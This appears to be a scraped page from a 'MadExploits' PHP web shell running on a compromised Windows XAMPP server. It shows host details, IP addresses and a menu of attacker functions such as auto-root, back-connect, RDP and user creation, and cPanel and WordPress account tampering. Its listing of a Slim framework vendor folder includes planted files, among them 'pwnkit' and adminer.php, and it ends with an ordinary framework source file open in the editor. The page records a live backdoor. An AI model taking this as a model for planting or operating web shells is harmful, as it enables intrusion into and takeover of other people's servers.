Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.139
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
vendor /
slim /
psr7 /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Factory
[ DIR ]
drwxrwxrwx
Interfaces
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
Cookies.php
5.27
KB
-rw-rw-rw-
Environment.php
1.51
KB
-rw-rw-rw-
Header.php
1.9
KB
-rw-rw-rw-
Headers.php
8.68
KB
-rw-rw-rw-
Message.php
3.8
KB
-rw-rw-rw-
NonBufferedBody.php
2.45
KB
-rw-rw-rw-
Request.php
8.38
KB
-rw-rw-rw-
Response.php
8.5
KB
-rw-rw-rw-
Stream.php
8.98
KB
-rw-rw-rw-
UploadedFile.php
8.34
KB
-rw-rw-rw-
Uri.php
11.22
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : NonBufferedBody.php
<?php /** * Slim Framework (https://slimframework.com) * * @license https://github.com/slimphp/Slim-Psr7/blob/master/LICENSE.md (MIT License) */ declare(strict_types=1); namespace Slim\Psr7; use Psr\Http\Message\StreamInterface; use RuntimeException; use function flush; use function ob_get_clean; use function ob_get_level; use function strlen; use const SEEK_SET; class NonBufferedBody implements StreamInterface { /** * {@inheritdoc} */ public function __toString(): string { return ''; } /** * {@inheritdoc} */ public function close(): void { throw new RuntimeException('A NonBufferedBody is not closable.'); } /** * {@inheritdoc} */ public function detach() { return null; } /** * {@inheritdoc} */ public function getSize(): ?int { return null; } /** * {@inheritdoc} */ public function tell(): int { return 0; } /** * {@inheritdoc} */ public function eof(): bool { return true; } /** * {@inheritdoc} */ public function isSeekable(): bool { return false; } /** * {@inheritdoc} */ public function seek($offset, $whence = SEEK_SET): void { throw new RuntimeException('A NonBufferedBody is not seekable.'); } /** * {@inheritdoc} */ public function rewind(): void { throw new RuntimeException('A NonBufferedBody is not rewindable.'); } /** * {@inheritdoc} */ public function isWritable(): bool { return true; } /** * {@inheritdoc} */ public function write($string): int { $buffered = ''; while (0 < ob_get_level()) { $buffered = ob_get_clean() . $buffered; } echo $buffered . $string; flush(); return strlen($string) + strlen($buffered); } /** * {@inheritdoc} */ public function isReadable(): bool { return false; } /** * {@inheritdoc} */ public function read($length): string { throw new RuntimeException('A NonBufferedBody is not readable.'); } /** * {@inheritdoc} */ public function getContents(): string { return ''; } /** * {@inheritdoc} */ public function getMetadata($key = null): ?array { return null; } }
Close